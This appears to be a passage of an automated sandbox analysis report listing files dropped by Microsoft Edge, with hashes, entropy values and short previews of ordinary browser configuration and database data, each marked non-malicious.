                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):2.7609722424828327
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:tTfdrxrM/SJiuSHkejT9O/q87U57GN5Xcf0L/ZJVb:VfdO/wiuKLjTQ/bKGN5XI0LhJVb
                                                                                                                                                                                                                                                                              MD5:FF9DF87E1C53F3DB1707DBF21579F11E
                                                                                                                                                                                                                                                                              SHA1:ADB4D83A47056989CD8D1A8B3609578D7C75994C
                                                                                                                                                                                                                                                                              SHA-256:93258CE06B2CF1E8EABBCB46AC97ABEFC5A88E991407CA63954F25D4771520F8
                                                                                                                                                                                                                                                                              SHA-512:B6EEC437621AA9D487CB1A9E5D630CD8DC9C8E9C49A082E565F64ABD2389A87EA67FAD7A552855902BBC89E5AB06F2F7ACC21833C9F4D7CD495B1D1D9181786B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1618
                                                                                                                                                                                                                                                                              Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                              MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                              SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                              SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                              SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1618
                                                                                                                                                                                                                                                                              Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                              MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                              SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                              SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                              SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                              Entropy (8bit):1.2784066120502957
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cS2WG:JkIEumQv8m1ccnvStDHiixM1a
                                                                                                                                                                                                                                                                              MD5:7D86AB54AC5D2915327F03EC29C4DFBA
                                                                                                                                                                                                                                                                              SHA1:38B754433EA105E01D3E0FD140F8149713619A4F
                                                                                                                                                                                                                                                                              SHA-256:21A878A3B913CBADA1E7495C4BEEDB5749613223EE84FD15C75C56F51949897E
                                                                                                                                                                                                                                                                              SHA-512:30D10BADF71625944C1D81562D215C7C66FC4EF7F3EB736633A3E0E1DDDE099A24231B6882191AB3F6684CDC1341CECE01F8483E115B433203DD6090F5460740
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                              MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                              SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                              SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                              SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                              Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9574
                                                                                                                                                                                                                                                                              Entropy (8bit):5.110007633087676
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0kdpNspFyaNP9ktCM+68WbV+FedQAq2+PyYJ:st0QNspFtJ0bGkQqM
                                                                                                                                                                                                                                                                              MD5:4AE900B76E77FD4AA8C168C44E82BCE3
                                                                                                                                                                                                                                                                              SHA1:8462F40820135A70F5C8CB9C5E231151489E7097
                                                                                                                                                                                                                                                                              SHA-256:5B60FC3A130DBA4B6495325A5E6233D53D812563151771E023A50DA924468A42
                                                                                                                                                                                                                                                                              SHA-512:16D6EA6ACB44E6D60FC0E92B24D160E35934AD1F57F5AF1F2812E4BABCAB74A8A1F14C64A9F8094A24E568CB32B59D6444DD043F82F67E52519E388AB326BFAE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9574
                                                                                                                                                                                                                                                                              Entropy (8bit):5.110007633087676
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0kdpNspFyaNP9ktCM+68WbV+FedQAq2+PyYJ:st0QNspFtJ0bGkQqM
                                                                                                                                                                                                                                                                              MD5:4AE900B76E77FD4AA8C168C44E82BCE3
                                                                                                                                                                                                                                                                              SHA1:8462F40820135A70F5C8CB9C5E231151489E7097
                                                                                                                                                                                                                                                                              SHA-256:5B60FC3A130DBA4B6495325A5E6233D53D812563151771E023A50DA924468A42
                                                                                                                                                                                                                                                                              SHA-512:16D6EA6ACB44E6D60FC0E92B24D160E35934AD1F57F5AF1F2812E4BABCAB74A8A1F14C64A9F8094A24E568CB32B59D6444DD043F82F67E52519E388AB326BFAE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                              Entropy (8bit):5.567332610294245
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:O4biuUWPxZftI8F1+UoAYDCx9Tuqh0VfUC9xbog/OV2DPE8rwU2p8ftur:O4biuUWPxZftIu1ja3DE1+ftE
                                                                                                                                                                                                                                                                              MD5:6A0E894DD7C4EC49A9D96BB1A55B5796
                                                                                                                                                                                                                                                                              SHA1:748B0908F3ECD3B4EF79DD8B499033E19C03AA1A
                                                                                                                                                                                                                                                                              SHA-256:1A90647A66DBB407C24BFB63C7AC206F32B7084FCF0B4C6A270CB935681EB414
                                                                                                                                                                                                                                                                              SHA-512:605AB18E140E4D1D3EBC55449AB3E629F70E29D7259418E8A80EE6474D66AAD730EA4031D9ECCF07ED89F033CC6CABF2D446A00659CF4B4D67A80C5F6FB4ACC8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379154132664972","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379154132664972","location":5,"ma
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2294
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8300418887672265
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:F2xc5Nmucncmo0CRORpllg2DDfRH+VdCRORpllg2NLTqKCRORpllg2DGRH+ECRO1:F2em/trdDDfBwXrdJNrdDGBXrd5Bl
                                                                                                                                                                                                                                                                              MD5:B2326B417F797B3D1AA172A6015D7520
                                                                                                                                                                                                                                                                              SHA1:3EBBB9353E1CC9AF95ED1CA5A5299AF220D8E254
                                                                                                                                                                                                                                                                              SHA-256:057093E07FBFC77F7ADF209F22D14A9E1CDFBC47A7ADEE78CA1642006DC27954
                                                                                                                                                                                                                                                                              SHA-512:F382CE887582CFF8BFE92CFBB1757F671FCBAD3D11F6265417FFF7CEB2F7ACC790B7B8A276FDB1ECB50735E635BBAADA8BA30AC62ABE2593D5BB81CB98C089A7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):305
                                                                                                                                                                                                                                                                              Entropy (8bit):5.10957809131782
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxh1cNwi23oH+TcwtE/a252KLl1XfxHpM+q2PcNwi23oH+TcwtE/a2ZIFUv:RvZYeb8xL5C+vLZYeb8J2FUv
                                                                                                                                                                                                                                                                              MD5:DB5BCB399471E33EE348DF81EF6DA704
                                                                                                                                                                                                                                                                              SHA1:51F4423B56C7E5BD98650D7B3BA42FDC4C9B83B9
                                                                                                                                                                                                                                                                              SHA-256:D29FB117FD7049BB58D0DD3F3EB17F8BD2C54387AFA517862CF7DB3C04FBADB6
                                                                                                                                                                                                                                                                              SHA-512:31DFFABFA205EF90BF1C468DEFFBF551E85AE2DCADB6E6DA6ED507100DC6DBFEC155C3245052B4BEA47A0AD6280E34F9ED8AFBF5E490F4522C09D3778B411F37
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:27.928 1aac Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/20-02:42:27.938 1aac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):114579
                                                                                                                                                                                                                                                                              Entropy (8bit):5.579716861969507
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsyIZ7Qg/a9K:J9LyxPXfOxr1lMe1nL/5L/TXE6W7vN
                                                                                                                                                                                                                                                                              MD5:3CA93201B6EEF42327ED9066A80743CB
                                                                                                                                                                                                                                                                              SHA1:22B800BBE2FDDB9CC21F46B45352FA215C20916F
                                                                                                                                                                                                                                                                              SHA-256:2DAB16EFF68D7078C1C45565273A2DB1303DC5DA02731C665CF16CEF79CD0B5E
                                                                                                                                                                                                                                                                              SHA-512:A0D65789B6B05F125B632C1BE78A1D2BDF1DB7CAA24100EA196918B671659E32053312DB269185A250DCADD055C9529D476EDAA3985433F0E6B758000656C096
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):189081
                                                                                                                                                                                                                                                                              Entropy (8bit):6.386237234247522
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:JZuNq/aW9LqwcUI0bQ46L/uyToG4va9UVFw4euUNLLl:SCqwcKbaL/5s+98Al
                                                                                                                                                                                                                                                                              MD5:38E7CB7CEE4E483F3FB81FC7777EE964
                                                                                                                                                                                                                                                                              SHA1:406CFC68AEFF9FB90352A552B11201924355A1DF
                                                                                                                                                                                                                                                                              SHA-256:24D13D1D8E2CDD7334A4A07C325BE8D6F64475BABE2FDE6222B02FFFEDC491FD
                                                                                                                                                                                                                                                                              SHA-512:41350A1D143B8A67F2ADA7272C3ED6C805BCA3259A882B40B7954A13D4997CD776F403F1C0109314B30EA144B6FDF4453A62D1037D0C9C8D762E6887AE72313B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:0\r..m..................
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                                              Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Yh56XTXl/lYV/lxEstllQZ4n1:YhOjYWs+G1
                                                                                                                                                                                                                                                                              MD5:F743ADD09711E120BB77A98B1E74D6C3
                                                                                                                                                                                                                                                                              SHA1:04B5E4EF6921DC3389B0C4B10C43A3D089315D2E
                                                                                                                                                                                                                                                                              SHA-256:44FB29EA370C35AD5699DC0F100AECF387F3C30A50AE40A29A5E99B3CC7C97ED
                                                                                                                                                                                                                                                                              SHA-512:AC594DF7641C1756757206D9E9E775720FEFFD0EA50021B8C040819D70D1575C74B07147E9CBE03E6FCDF9DB7E271B04E2D05FE0A10AB687814226A808F63C0A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:@...mD..oy retne.........................X....,..................r.E./.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                                              Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Yh56XTXl/lYV/lxEstllQZ4n1:YhOjYWs+G1
                                                                                                                                                                                                                                                                              MD5:F743ADD09711E120BB77A98B1E74D6C3
                                                                                                                                                                                                                                                                              SHA1:04B5E4EF6921DC3389B0C4B10C43A3D089315D2E
                                                                                                                                                                                                                                                                              SHA-256:44FB29EA370C35AD5699DC0F100AECF387F3C30A50AE40A29A5E99B3CC7C97ED
                                                                                                                                                                                                                                                                              SHA-512:AC594DF7641C1756757206D9E9E775720FEFFD0EA50021B8C040819D70D1575C74B07147E9CBE03E6FCDF9DB7E271B04E2D05FE0A10AB687814226A808F63C0A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:@...mD..oy retne.........................X....,..................r.E./.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):432
                                                                                                                                                                                                                                                                              Entropy (8bit):4.351123185103311
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:S+a8ljljljljlSllcajfCMeyI9hdSkAvkAvkAv:Ra0ZZZZSllcaYRhdSk8k8k8
                                                                                                                                                                                                                                                                              MD5:8D957FD7A344C934F1DD32CBAB689F2D
                                                                                                                                                                                                                                                                              SHA1:51659DDFFE1279A4DDA2C8CBC3DAEC8C5B520AE8
                                                                                                                                                                                                                                                                              SHA-256:3E484C881A73A86A1E3E5C911E068A7DC646602D63E3C613FCEDA1629E7D2BA9
                                                                                                                                                                                                                                                                              SHA-512:3298691111F215FB56C886B3929306D826A7D6CE634D10E076168F10418638DCA2940D6FFB4A15D010621DEF1DDA5BD4079A632A63DC34A0854070DE7151F798
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................Ou}b................next-map-id.1.Cnamespace-f2df52a8_64fc_47fc_9801_1235d6a23fa5-https://ntp.msn.com/.0..g.k................map-0-shd_sweeper8{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".g.h.o.l.d.o.u.t.".}...map-0-storageTest. .................. .................. .................. .................
